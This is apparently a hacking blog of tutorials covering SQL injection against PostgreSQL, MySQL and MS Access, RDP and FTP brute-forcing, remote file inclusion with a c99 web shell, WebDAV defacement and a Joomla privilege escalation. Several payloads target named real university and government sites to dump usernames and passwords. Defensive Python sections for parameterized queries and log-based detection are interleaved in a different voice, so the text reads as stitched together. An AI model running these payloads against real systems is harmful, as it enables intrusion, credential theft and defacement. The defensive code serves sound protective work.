Wednesday, February 19, 2014

PostgreSQL SQL Injection

NOTE: This tutorial is for educational purposes only.

Well, you can verify this vulnerability (as Net_Spy, a good SQL injector, puts it) by the error message the page returns:

MySQL -> the error mentions MYSQL
MS SQL -> the error mentions SQL
Oracle -> the error mentions ORA
MS Access -> the error mentions Jet
PostgreSQL -> Warning: pg_exec () [function.pg-exec]

But in our case the page is blank (I think the worst case).
Well, some basics for it first:

|| is the concatenation operator in PostgreSQL (just like Oracle).
We can use LIMIT here, but with an addition, OFFSET, if results are displayed one at a time.

The rest is the same, I think, just like MySQL.

Now the column count.
The column count is found the same way as in MySQL, MSSQL and Oracle, with an ORDER BY clause.

Comments in PostgreSQL:
-- This is a standard SQL comment
/* this is
 * multiline comments syntax
 */

Casting in PostgreSQL:
CAST ( 'string' AS type )

Now let's inject the site.
With the ORDER BY clause we came to know that there are 8 columns in the SELECT statement before the UNION.

Okay, now UNION SELECT the columns.
Here we use null, like in MSSQL or Oracle, because we don't know the data types; unlike PHP, these are typed.
So one by one put a string in place of null, and you will see the string in the web page if the column data type is nvarchar/nchar/char/varchar.

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,'Ch3rnoby1 Black Hat',null,null,null,null,null,null--+

Now for version():
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,version(),null,null,null,null,null,null--+

For the database name:

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,datname,null,null,null,null,null,null from pg_database--+

If this shows only one, then we can use LIMIT, like this:

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,datname,null,null,null,null,null,null from pg_database LIMIT 1 OFFSET 1--+
Now just increase the limit and find all the other DBs.
OFFSET shows one row at a time, e.g.
limit 1 offset 1 =====> one database
limit 2 offset 2 =====> one database (next to the first)

or

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,datname,null,null,null,null,null,null from pg_database LIMIT 1--+
and likewise increase the limit to see the other databases.

Now enumerating table names.
This will show all tables in all databases:

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,table_name,null,null,null,null,null,null from information_schema.tables--+

To see only the tables of the current database we will use:

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,table_name,null,null,null,null,null,null from information_schema.tables where table_schema=current_schema()--+

Now column names.
This will show all columns of all tables of all databases:

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,column_name,null,null,null,null,null,null from information_schema.columns--+


To see only a specific table's columns we will use:

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,column_name,null,null,null,null,null,null from information_schema.columns where table_name='portal_user'--+
Now, if 'table_name' doesn't work, then you need to use
CHR(table_name), and this is Oracle's CHR().
You cannot use hex values anywhere in a PostgreSQL query (I've tested it; well, you can check yourself too).


Now dumping data.
This is the same as Oracle:
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,(user_name||'::::'||user_password),null,null,null,null,null,null from portal_user--+


For reference:
http://www.postgresql.org/docs/8.0/static/sql-syntax.html
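As an added example, not code from the original post, the Python below shows the defender's side of the deptid injection: the string-built query the affected page evidently uses (the quote, the UNION and the trailing comment all become live SQL), next to a typed check that rejects anything but an integer and a parameterized statement in which the value never becomes SQL text. The injected value is the one from the post; the table name `departments`, the column name and the function names are assumptions.

```python
import re
from typing import Optional, Tuple

# The injected value from the post: it closes the string literal, appends a UNION
# and comments out the rest of the original query with `--`.
INJECTED_DEPTID = "66' UNION SELECT null,version(),null,null,null,null,null,null--"


def build_query_vulnerable(deptid: str) -> str:
    """String concatenation, which is evidently what the affected page does:
    the raw parameter becomes part of the SQL text, so the quote, the UNION
    and the comment all take effect. (Table and column names are assumed.)"""
    return f"SELECT * FROM departments WHERE deptid = '{deptid}'"


def validate_deptid(deptid: str) -> Optional[int]:
    """Typed validation: deptid is a numeric identifier, so only a plain
    non-negative integer is acceptable. Quotes, spaces and keywords are
    rejected before the value gets anywhere near the database."""
    if re.fullmatch(r"[0-9]{1,9}", deptid):
        return int(deptid)
    return None


def build_query_parameterized(deptid: str) -> Tuple[str, tuple]:
    """Parameterized form, in the %s placeholder style psycopg2 uses (PHP's
    pg_query_params works the same way with $1): SQL text and data travel
    separately, so the driver never interprets the value as SQL. The example
    returns (sql, params) instead of executing, so it runs without a server."""
    value = validate_deptid(deptid)
    if value is None:
        raise ValueError("deptid must be an integer")
    return "SELECT * FROM departments WHERE deptid = %s", (value,)


if __name__ == "__main__":
    print(build_query_vulnerable(INJECTED_DEPTID))   # UNION SELECT ... is now live SQL
    print(validate_deptid(INJECTED_DEPTID))            # None: rejected
    print(build_query_parameterized("66"))             # ('... deptid = %s', (66,))
```

The typed check alone would already stop every payload in this post, because each of them needs a quote or a space inside the parameter; the parameterized form is the fix that holds even for parameters that legitimately are free text.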

Tutorial By Pk Injector

SQL Injection 1024 Bypass

NOTE: This tutorial is for educational purposes only.

1024 character limit bypass, classic syntax:

(select (@y) from (select (@y:=0x00), (select (0) from(information_schema.columns) where (table_schema!='information_schema') and (0x00) in (@y:=concat(@y,'<br>',table_schema,'-->',table_name,'-->',column_name))))x)



Without a simple firewall, when magic quotes are off:

(select (@y) from (select (@y:=0x00), (select (0) from(information_schema.columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@y:=concat(@y,0x3c62723e,table_schema,0x3a3a3a,table_name,0x3a3a3a,column_name))))x)



With a simple firewall, when magic quotes are off:

(/*!00000select*/ (@y) /*!from*/ (/*!00000select*/ (@y:=0x00), (/*!00000select*/ (0) /*!from*/(information_schema./**/columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@y:=concat(@y,0x3c62723e,table_schema,0x3a3a3a,/*!table_name*/,0x3a3a3a,/*!column_name*/))))x)


Dump a whole table without a simple firewall:

(select(@) from(select(@:=0x00) ,(select (@) from(dbname.table_name)where(@) in (@:=concat (0x20,@, username ,0x203a3a20, name ,0x203a3a20, email_id ,0x203a3a20, hash_link ,0x3c62723e))))a)



Dump a whole table with a simple firewall:

(/*!00000select*/(@) /*!from*/(/*!00000select*/(@:=0x00) ,(/*!00000select*/ (@) /*!from*/(dbname.table_name)where(@) in (@:=concat (0x20,@, column1 ,0x203a3a20, column2 ,0x203a3a20, column3 ,0x203a3a20, column4 ,0x203a3a20, column5,0x3c62723e))))a)

Tutorial by Pk Injector, with thanks to MakMan
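The "simple firewall" variants above differ from the plain ones only in three ways: keywords hidden in MySQL version comments (`/*!00000select*/`), identifiers split with empty comments (`/**/`), and string literals replaced by hex literals (`0x3c62723e` is `<br>`). As an added example, not code from the original post, the Python below undoes each of those transformations so a detector or WAF compares one canonical form; the two payload strings are copied from the post, and the function names are assumptions.

```python
import re

# Payloads copied from the post: plain form and the "simple firewall" form.
PLAIN = ("(select (@y) from (select (@y:=0x00), (select (0) from(information_schema.columns) "
         "where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in "
         "(@y:=concat(@y,0x3c62723e,table_schema,0x3a3a3a,table_name,0x3a3a3a,column_name))))x)")

OBFUSCATED = ("(/*!00000select*/ (@y) /*!from*/ (/*!00000select*/ (@y:=0x00), (/*!00000select*/ (0) "
              "/*!from*/(information_schema./**/columns) where "
              "(table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in "
              "(@y:=concat(@y,0x3c62723e,table_schema,0x3a3a3a,/*!table_name*/,0x3a3a3a,/*!column_name*/))))x)")

_VERSION_COMMENT = re.compile(r"/\*!\d*\s*(.*?)\*/", re.DOTALL)  # /*!00000select*/ -> select
_OTHER_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)              # /**/ -> (nothing)
_HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)\b")


def strip_comments(sql: str) -> str:
    """MySQL executes the body of /*!...*/ version comments, so keep that body;
    ordinary /* ... */ comments contribute nothing to the query and are dropped."""
    sql = _VERSION_COMMENT.sub(r"\1", sql)
    return _OTHER_COMMENT.sub("", sql)


def decode_hex_literals(sql: str) -> str:
    """Turn 0x... literals back into quoted strings when they decode to printable
    ASCII; leave the rest (such as 0x00) untouched so nothing is lost."""
    def repl(m: "re.Match") -> str:
        digits = m.group(1)
        if len(digits) % 2:
            return m.group(0)
        raw = bytes.fromhex(digits)
        if raw and all(0x20 <= b < 0x7F for b in raw):
            return "'" + raw.decode("ascii") + "'"
        return m.group(0)
    return _HEX_LITERAL.sub(repl, sql)


def normalize(sql: str) -> str:
    """Canonical form: comments resolved, hex decoded, case folded, whitespace collapsed."""
    sql = decode_hex_literals(strip_comments(sql))
    return re.sub(r"\s+", " ", sql).strip().lower()


_SCHEMA_DUMP = re.compile(r"\bselect\b.*\bfrom\b.*\binformation_schema\.columns\b", re.DOTALL)


def is_schema_dump(sql: str) -> bool:
    """Signature match against the normalized text, so the obfuscation is irrelevant."""
    return _SCHEMA_DUMP.search(normalize(sql)) is not None


if __name__ == "__main__":
    print(normalize(OBFUSCATED))
    print(normalize(OBFUSCATED) == normalize(PLAIN))  # True
```

Normalizing before matching is the general point: a signature written against the plain payload misses the comment-wrapped one unless the comments are resolved first, which is exactly the gap the "simple firewall" bypass exploits.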

MS Access SQLi

NOTE: This tutorial is for educational purposes only.
Quick Guide for MS Access Injection
Greetings to all,

Today I'm going to discuss MS Access injection, which is really rare and weird too. Hardly any websites still use it.

Introduction

MS Access is commonly thought of as the little brother of database engines, and not a lot of material has been published about methods used for exploiting it during a penetration test. MS Jet is often mistakenly thought of as being another name for MS Access, when in fact it is a database engine that is shipped as part of the Windows OS. MS Jet was, however, the core database engine used by MS Access up to version 2007. Since version 2007, MS Access has included a separate updated engine known as the Access Connectivity Engine. Although MS Jet is not as complex as more advanced databases such as SQL Server or Oracle, it is still commonly used by smaller websites that want quick and easy database storage.

Default Tables Used In Access

Note: Table names marked with * after the name can be used in a query.

Access 97
MSysAccessObjects *
MSysACEs
MSysModules
MSysModules2 *
MSysObjects
MSysQueries
MSysRelationship

Access 2000
MSysAccessObjects *
MSysAccessXML *
MSysACEs
MSysObjects
MSysQueries
MSysRelationships


Access 2002-2003
MSysAccessStorage *
MSysAccessXML *
MSysACEs
MSysObjects
MSysQueries
MSysRelationships


Access 2007
MSysAccessStorage *
MSysACEs
MSysComplexColumns
MSysComplexType_Attachment
MSysComplexType_Decimal
MSysComplexType_GUID
MSysComplexType_IEEEDouble
MSysComplexType_IEEESingle
MSysComplexType_Long
MSysComplexType_Short
MSysComplexType_Text
MSysComplexType_UnsignedByte
MSysNavPaneGroupCategories *
MSysNavPaneGroups *
MSysNavPaneGroupToObjects *
MSysNavPaneObjectIDs *
SysObjects
MSysQueries
MSysRelationships


As we can see, each version has some new default tables, and each of them works differently. But MS Access injection is a real pain: it does not contain a schema, and when we say schema that means we have to guess each table and column. Access also does not support error-based injection, nor does it have a global variable like @@version. So we can guess the version by the default tables.

Column Enumeration and Union

We will use # to comment out the rest of the query instead of -- or /*.

Step-1

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103

The above site is vulnerable to SQL injection; let's see what error we get:

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103'

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
  [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'DISTRICTNUMBER = 103''.
   /h_reps/members.asp, line 16

Step-2

Using ORDER BY to get the column count.

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 1# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 2# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 3# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 4# <== No error
We increment by 1 until we get an error:
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 35# <== Error

That means the total number of columns is 34. Let's proceed with UNION now.

If we are not sure about the data types we can proceed with NULL instead of integers.

Step-3

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from MSysAccessObjects#

We have used a default table name of MS Access 2000; see the list above.
Now on your screen you can see some numbers right under the page contents, like 17 19 20 ... .

The most common tables are:
users
admin
administrator
login
customers
user
members
member
customer

Step-4: Getting table

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members#

The page loads normally; that means we have found a valid table. Now let's enumerate columns.

Step-5 : Getting Columns

We will use GROUP BY and HAVING, for example:

GROUP BY tablename.column1 having 1=1#
GROUP BY tablename.column1,column2 having 1=1#
GROUP BY tablename.column1,column2,column(n).... having 1=1#

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members group by members.id having 1=1#


The page will load without any error. Now let's put "id" in place of the column number we see on our screen:

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,id,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members#


We have got the following data:
Code:
COMMITTEE ASSIGNMENTS
102

Now let's get the next column:

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members group by members.id,now having 1=1#


The page will load without any error. Now let's put "now" in place of the column number we see on our screen:

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,now,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members#


We have got the following data:
Code:
COMMITTEE ASSIGNMENTS
4/15/2011 3:06:13 PM


That's all, guys.

Special thanks to : Renorobert , N3t.Crack3R , Sho0ter

If you like this, do post your comments regarding it.

Tutorial by NET_Spy, with thanks to PK Injector
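Both the PostgreSQL post and the MS Access post above follow the same noisy sequence from the server's point of view: one client repeats a URL with `order by 1`, `order by 2`, ... until an error, then sends `UNION SELECT` with a placeholder per column and (for Access) `group by t.col having 1=1` column guesses. As an added example, not code from either post, the Python below reads that sequence out of ordinary access-log lines by URL-decoding each request and aggregating the markers per client. The log lines, host paths and addresses (documentation IP ranges) are constructed, and the function names and the probe threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines in common log format; 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges, and the paths mirror the two posts.
SAMPLE_LOG = """\
203.0.113.9 - - [19/Feb/2014:10:00:01 +0000] "GET /members.asp?id=103 HTTP/1.1" 200 5120
203.0.113.9 - - [19/Feb/2014:10:00:05 +0000] "GET /members.asp?id=103%20order%20by%201%23 HTTP/1.1" 200 5120
203.0.113.9 - - [19/Feb/2014:10:00:06 +0000] "GET /members.asp?id=103%20order%20by%202%23 HTTP/1.1" 200 5120
203.0.113.9 - - [19/Feb/2014:10:00:07 +0000] "GET /members.asp?id=103%20order%20by%2035%23 HTTP/1.1" 500 310
203.0.113.9 - - [19/Feb/2014:10:00:20 +0000] "GET /members.asp?id=103%20UNION%20SELECT%201,2,3%20from%20members%20group%20by%20members.id%20having%201=1%23 HTTP/1.1" 200 5300
203.0.113.9 - - [19/Feb/2014:10:00:30 +0000] "GET /view_department.php?deptid=66%27%20UNION%20SELECT%20null,version(),null--+ HTTP/1.1" 200 4100
198.51.100.7 - - [19/Feb/2014:10:01:00 +0000] "GET /members.asp?id=104 HTTP/1.1" 200 5100
"""

_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})')
_ORDER_BY = re.compile(r"\border\s+by\s+(\d+)", re.IGNORECASE)
_UNION = re.compile(r"\bunion\s+(all\s+)?select\b", re.IGNORECASE)
_GROUP_HAVING = re.compile(r"\bgroup\s+by\b.*\bhaving\b", re.IGNORECASE | re.DOTALL)


def parse_line(line: str):
    """Return (ip, decoded_url, status) or None for lines that do not parse.
    Decoding first matters: the probes arrive as %20, %27 and %23."""
    m = _LINE.match(line)
    if not m:
        return None
    return m.group("ip"), unquote_plus(m.group("url")), int(m.group("status"))


def summarize(log_text: str) -> dict:
    """Per client: which ORDER BY positions were probed, how many UNION SELECT
    requests were sent, how many GROUP BY ... HAVING guesses, how many 5xx errors."""
    clients = defaultdict(lambda: {"order_by": set(), "union": 0, "group_having": 0, "errors": 0})
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if not parsed:
            continue
        ip, url, status = parsed
        c = clients[ip]
        for n in _ORDER_BY.findall(url):
            c["order_by"].add(int(n))
        if _UNION.search(url):
            c["union"] += 1
        if _GROUP_HAVING.search(url):
            c["group_having"] += 1
        if status >= 500:
            c["errors"] += 1
    return dict(clients)


def suspicious_clients(log_text: str, min_probes: int = 3) -> list:
    """A client that walks several ORDER BY positions, or sends any UNION SELECT
    or GROUP BY/HAVING guess, is enumerating the schema rather than browsing."""
    flagged = []
    for ip, c in summarize(log_text).items():
        if len(c["order_by"]) >= min_probes or c["union"] or c["group_having"]:
            flagged.append(ip)
    return sorted(flagged)


if __name__ == "__main__":
    stats = summarize(SAMPLE_LOG)
    for ip in suspicious_clients(SAMPLE_LOG):
        print(ip, stats[ip])
```

The ORDER BY walk is the most reliable signal of the three, because a real application never sends the same page request with a changing numeric ORDER BY position, whereas a single UNION keyword can appear in legitimate search input.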

Friday, November 22, 2013

RDP a.k.a. VPS Cracking

NOTE: This tutorial is for educational purposes only.
Salam to all.
Let's start: how to crack RDP, a.k.a. VPS....
All you need are two programs, called DuBrute and VNC_Scanner, to hack a VPS.
You can download these tools from the links given, or find them easily by searching on Google:
for VNC_Scanner http://www.mediafire.com/?dka5g2wurcjaugv
and for DuBrute http://www.mediafire.com/?l5l416b99bd748c

1) Download both files from the above links.

2) Extract both files anywhere on your PC.

3) Open the Vnc_scanner folder.

4) Open the exe file called vnc_scanner_gui.exe.

NOTE: Here is a point which is never explained on any forum I have ever seen: this VNC scanner never gives you a dial-up list or country IP list.
I saw users always asking about this problem, so I will explain its solution here....
First of all:
5) Select any country.

6) Click on Get Dial List.
If you get a country IP list then you are lucky enough; otherwise, as I said, this feature will not work. You can get any country's IPs by
going to this site and searching the IP range for any country:

http://www.proxysecurity.com/ip-address-...y=RESERVED

See image http://postimage.org/image/6gw62kc57/

After getting the IP list, paste it into Notepad. Here you have to edit this list a bit: the " - " between IPs has extra spaces and VNC will not accept this list, so replace " - " with a simple "-", as explained in the image.

See image http://postimage.org/image/vlch3uvy7/

http://postimage.org/image/m64jueplz/

Now paste that into the VNC scanner's -i box and start the scan as shown in the screenshot:
http://postimage.org/image/wclsahvov/

After that it will scan for working VPS IPs as in the figure:
http://postimage.org/image/kl73r6fu7/

After the scan finishes, click on Start parser (this is an option in vnc_scanner, as you can see in the VNC scanner's picture). It will save the good IPs in a new text file called IPs.txt in the same folder where vnc_scanner is placed.

Now you need to get the usernames and passwords for the scanned IPs. For that you have to use one of the hacking programs, called DuBrute.



1) Open the DuBrute folder.

2) Copy the IPs.txt file from the vnc_scanner folder and paste it into the DuBrute folder.

3) Open DUBrute.exe as shown in the screenshot...
http://postimage.org/image/hwf0m94h5/

4) Click on Generation as shown in the screenshot...
http://postimage.org/image/nw541x1gv/

1st, click on File ip, then select the text file called IPs.txt which you already have in your vnc_scanner folder.

2nd, you need to provide a txt file of usernames....
Put some usernames like
admin
root
user
etc.
in Notepad and save it, then select this txt file.

3rd, you need a password txt file too.... You can also put some common passwords in Notepad and save it as a password list, then select this password list as in the figure's 3rd option...

Now press Start in DuBrute.



Let it brute-force the combinations. When a working VPS matches an IP, username and password, it will be saved in the DuBrute folder in a file called good.txt
http://postimage.org/image/m76gevah3/
This image shows that I found 3 VPS which are working.
After getting a working VPS, open "Remote Desktop Connection" on your PC and enter the IP; it will ask for user and pass; enter the login details and you will be redirected to the remote PC.


That's all. One more thing: your AV may detect these 2 cracking programs as a virus, so ignore it....

If you get any problem then feel free to contact me here on madleets or on FB https://www.facebook.com/mindfreakzzz

Regards
gujjar haxor (pcp)

Wednesday, November 20, 2013

RFI (Remote File Inclusion) Website Hacking Tutorial

NOTE: This tutorial is for educational purposes only, to get the concept of an RFI attack.


Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few, it can lead to:
- Code execution on the web server
- Code execution on the client side, such as JavaScript, which can lead to other attacks such as cross-site scripting (XSS)
- Denial of Service (DoS)
- Data theft/manipulation

Let's start.
1st Step: Find vulnerable websites using a Google dork.

"inurl:index.php?page=" is the most popular dork for RFI hacking.

This will show all the pages which have "index.php?page=" in their URL. Now, to test whether the website is vulnerable to remote file inclusion or not, the hacker uses the following command.

See the example of this website: http://www.cbspk.com

So the hacker's URL will become:

www.targetsite.com/index.php?page=www.google.com
http://www.target.com/v2/index.php?page=http://www.google.com

If after executing the command the Google homepage shows up, then the website is vulnerable to this attack; if it does not come up then you should look for a new target. In my case, after executing the above command in the address bar, the Google homepage showed up, indicating that the website is vulnerable to this attack.

The hacker would first upload the shells to a web hosting site such as ripway.com, viralhosts.com, 110mb.com or other free hosts.

Now the hacker would upload the shells to gain access. The most common shells used are the c99 shell or the r57 shell. I would use the c99 shell. You can download the c99 shell from the link below:

Now here is how a hacker would execute the shell to gain access. Let's say that the URL of the shell is http://www.sh3ll.org/c99.txt?

http://www.target.com/v2/index.php?page=http://www.sh3ll.org/c99.txt?

Don't forget to add "?" after .txt at the end of the URL, or else the shell will not execute. Now the hacker is inside the website and he could do anything with it.

Regards
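The test in the post (does `?page=http://www.google.com` render Google?) works only when the application hands the parameter straight to an include. As an added example, not code from the original post, the Python below is the hardened counterpart of that `index.php?page=` pattern, written in Python for illustration although the affected pages are PHP: it classifies each value (so the probes above are also easy to log and alert on), accepts only names from a fixed allow-list, and re-checks that the resolved file stays inside one template directory. The page names, the directory path and the function names are constructed assumptions.

```python
import re
from pathlib import Path

# Constructed allow-list: the only page names the application knows about,
# mapped to files. The request parameter is a key, never a path or a URL.
PAGES = {"home": "home.html", "about": "about.html", "contact": "contact.html"}
TEMPLATE_DIR = Path("/var/www/app/pages")  # assumed location, not from the post

_SAFE_NAME = re.compile(r"^[a-z0-9_-]{1,32}$")


class IncludeRejected(ValueError):
    """Raised for any value that must not reach an include."""


def classify(page: str) -> str:
    """Say why a value is rejected; useful both for the application's own log
    and for a detection rule. The probes in the post land in 'remote-url'."""
    lowered = page.lower()
    if "://" in lowered or lowered.startswith(("www.", "//")):
        return "remote-url"
    if ".." in page or "/" in page or "\\" in page or "\x00" in page:
        return "traversal-or-nul"
    if not _SAFE_NAME.match(page):
        return "bad-characters"
    if page not in PAGES:
        return "unknown-page"
    return "ok"


def resolve_include(page: str) -> Path:
    """Map a request parameter to a local template path, or refuse.
    The final containment check re-verifies the resolved path, so a mistake
    in the allow-list itself cannot escape TEMPLATE_DIR."""
    verdict = classify(page)
    if verdict != "ok":
        raise IncludeRejected(f"{page!r}: {verdict}")
    target = (TEMPLATE_DIR / PAGES[page]).resolve()
    if TEMPLATE_DIR.resolve() not in target.parents:
        raise IncludeRejected(f"{page!r}: resolved outside the template directory")
    return target


if __name__ == "__main__":
    for value in ("home", "www.google.com", "http://www.google.com", "../../etc/passwd", "admin"):
        print(f"{value!r:28} -> {classify(value)}")
```

In PHP the equivalent is the same allow-list lookup before `include`, together with `allow_url_include=Off` in php.ini so that a URL can never be included even if the lookup is bypassed.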

Hack FTP Passwords Using a Brute Force Attack

NOTE: This tutorial is for educational purposes, to understand FTP password cracking, so put a secure and complex password on your FTP.

FTP is an application, service or protocol which can be used to transfer files from one place to another; it really comes in very handy when transferring files from a local box to a remote one. Suppose someone gets access to your FTP: then he/she can cause a nightmare for you by uploading inappropriate images or files, etc. Here we will discuss how we can crack the password of the FTP service installed with IIS on Windows.




What is Brute Force?

Brute force is a type of attack in which every possible combination of letters, digits and special characters is tried until the right password is matched with the username. The main limitation of this attack is the time factor: the time it takes to find the proper match depends mainly on the length and complexity of the password. Here I will be using this attack to crack the password. So, let's start....
Requirements:

  1. The tool we will be using: "BrutusA2" (Download: http://www.hoobie.net/brutus/)
  2. You need to know the target, suppose "ftp://123.123.xx.xxx"

Procedure:

Step 1. Here I have shown an authentication page of an FTP service in the image below, and in the following steps we will crack its password using Brutus.

Step 2. Now open up "Brutus", type your desired target, select a wordlist, select "FTP" from the drop-down menu and click Start. If you are confused then follow the image below.

Step 3. The time it takes, as I mentioned above, depends on the complexity and length of the password. So after clicking the Start button, wait for the time shown in the tool. The password will be displayed as shown above.
Recommendation: I would recommend that readers try it in a virtual environment, as I did, and enjoy the trick. It is not advisable to try it on some unknown user without prior permission.
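From the server's side, DuBrute against RDP (the VPS post above) and Brutus against FTP (this post) look the same: one source address produces a burst of failed logons against one service, often cycling through usernames, sometimes followed by a success. As an added example, not code from either post, the Python below finds such bursts with a sliding time window per (service, source) and flags the case a responder should look at first, a burst followed by a successful logon. The records are constructed (documentation IP ranges, made-up users), and the field layout, window and threshold are assumptions rather than any product's log format.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed logon records: (timestamp, service, source_ip, user, outcome).
EVENTS = [
    ("2013-11-22 09:00:00", "rdp", "203.0.113.50", "administrator", "fail"),
    ("2013-11-22 09:00:02", "rdp", "203.0.113.50", "admin", "fail"),
    ("2013-11-22 09:00:04", "rdp", "203.0.113.50", "root", "fail"),
    ("2013-11-22 09:00:06", "rdp", "203.0.113.50", "user", "fail"),
    ("2013-11-22 09:00:08", "rdp", "203.0.113.50", "administrator", "fail"),
    ("2013-11-22 09:00:10", "rdp", "203.0.113.50", "administrator", "success"),
    ("2013-11-22 09:05:00", "ftp", "198.51.100.20", "webmaster", "fail"),
    ("2013-11-22 09:05:01", "ftp", "198.51.100.20", "webmaster", "fail"),
    ("2013-11-22 09:05:02", "ftp", "198.51.100.20", "webmaster", "fail"),
    ("2013-11-22 09:05:03", "ftp", "198.51.100.20", "webmaster", "fail"),
    ("2013-11-22 09:05:04", "ftp", "198.51.100.20", "webmaster", "fail"),
    ("2013-11-22 09:05:05", "ftp", "198.51.100.20", "webmaster", "fail"),
    ("2013-11-22 10:00:00", "rdp", "192.0.2.8", "alice", "fail"),
    ("2013-11-22 10:00:30", "rdp", "192.0.2.8", "alice", "success"),  # one typo, then a normal login
]


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def find_bursts(events, window=timedelta(minutes=1), threshold=5):
    """Per (service, source): report sources whose failed logons reach
    `threshold` inside any `window`, with the distinct users tried and whether
    a success followed the burst. Returns {(service, source): details}."""
    fails = defaultdict(list)      # (service, src) -> [(time, user)]
    successes = defaultdict(list)  # (service, src) -> [(time, user)]
    for ts, service, src, user, outcome in events:
        key = (service, src)
        (fails if outcome == "fail" else successes)[key].append((_ts(ts), user))

    alerts = {}
    for key, recs in fails.items():
        recs.sort()
        # Sliding window: anchor on each failure and count failures up to `window` later.
        for i, (t0, _) in enumerate(recs):
            in_win = [(t, u) for t, u in recs[i:] if t - t0 <= window]
            if len(in_win) >= threshold:
                burst_end = in_win[-1][0]
                alerts[key] = {
                    "failures": len(in_win),
                    "users": sorted({u for _, u in in_win}),
                    "success_after": any(t >= burst_end for t, _ in successes.get(key, [])),
                }
                break  # one alert per source is enough; later windows add nothing new
    return alerts


if __name__ == "__main__":
    for (service, src), info in find_bursts(EVENTS).items():
        print(f"{service} {src}: {info}")
```

The user list distinguishes the two tools' styles: many users against one host (the username file from the RDP post) versus one user with many passwords (the wordlist from this post); both are answered by account lockout or rate limiting at the service and by blocking the source, and the `success_after` flag is the one that turns the alert into an incident.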

WebDAV Hacking & Defacing Detailed Tutorial

NOTE: This tutorial is for educational purposes only.
Hi guys!
Today I will explain to you how to hack and deface WebDAV sites.
It's really easy, and this tutorial will clearly show you how to do it.
Let's start...


Open up 'Map Network Drive':
- Windows XP: right-click on My Computer
- Windows 7: click the Start bar

Now it will show a new little window.
Click on 'Sign up for online storage or connect to a network server'.

A new window will show up; click Next.
Again click Next.
Now type in the server's IP or domain that has WebDAV enabled.
Ensure you put http:// and the WebDAV directory, otherwise it may not work. Then click Next.

Now you'll get a login prompt. Log in with these credentials:
User name: wampp
Password: xampp
And click OK.

At the next window you can choose whatever you want, but I prefer leaving its default name. It's not important. Then click Next again.
Here is the last window; be sure to tick the checkbox 'Open this network place when I click Finish.'
And click Finish!

Now you'll get the prompt again; just log in with the same credentials I mentioned before.

And voilà, we now have access to upload files. Just drag and drop there with the cursor an ASPX/PHP shell (if it accepts it), an index.html file or simply a text file.
Then go to your browser and navigate to http://yourslave/webdav/shell.php (replace shell.php with your shell's name), and you'll have access to its server.

Joomla Privilege Escalation Vulnerability


NOTE: This tutorial is for educational purposes, to secure your Joomla and update it.

Salam to all. GUJJAR(PCP) is here. I'm going to show you a demo of Joomla user privilege escalation. Although it is an old exploit, the purpose of sharing is to clear up concepts for beginners. I made this video for madleets and specially for AZ Sniffer(pcp).

Google dork: inurl:index.php/component/users/?view=registration

Value to put in the source: <input name="jform[groups][]" value="7">

Watch the video here:

https://www.youtube.com/watch?v=fLHvseOrZ2M

Regards Gujjar(pcp)